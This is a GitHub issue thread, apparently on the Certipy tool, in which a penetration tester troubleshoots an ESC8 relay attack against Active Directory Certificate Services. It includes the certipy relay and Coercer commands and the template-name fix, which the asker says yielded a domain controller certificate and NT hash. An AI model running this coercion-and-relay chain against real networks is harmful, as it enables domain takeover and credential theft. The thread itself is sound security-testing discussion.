New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Help understanding "relay" issues? #99
Comments
Since you are coercing authentication from the machine account of a DC and not a regular machine, try adding the flag "-template DomainController" to the Certipy command. If that template is missing, try "-template KerberosAuthentication". As you can see from the output of Certipy, that defaults to the "Machine" template. Also note that you probably don't need to authenticate to the DC when coercing from it :) |
Hello and thanks for the help! When I run with
If I do
|
Which templates are enabled on the ADCS server? Can you list them using Certipy? Unless of course you think that would be sensitive to share given that you are currently on a pentest. |
Hello, yeah I think being this is my first time with ESC8 I might've been approaching this the wrong way. But to answer your question, when I do a
Then as I continue down through the Does that mean I should do |
If you do not see the default templates "DomainController" or "KerberosAuthentication" they may not be published for some reason. Your client may have replaced the "DomainController" template with their own template named "DC". Yes try using that instead. |
@jsdhasfedssad you're an absolute champ, thank you. YES that was the case in that the DomainController template had been renamed. Once I got the name right the pfx got generated and DC NT hash came shortly after. Cheers! |
Hello!
I'm on a pentest where Certipy has reported a host called "CA" is vulnerable to ESC8.
I setup Certipy in one window as follows:
certipy relay -ca ca.domain.com
In another window I did Coercer with:
coercer.py -u lowprivuser -p mypass -t IP.OF.A.DC -l MY.KALI.IP.ADDRESS
In the Certipy window I get:
It seems like this is the kind of behavior I'd expect to see if the config was vulnerable to ESC7.
Any help pointing me in the right direction to troubleshoot would be much appreciated!
Thanks,
Brian
The text was updated successfully, but these errors were encountered: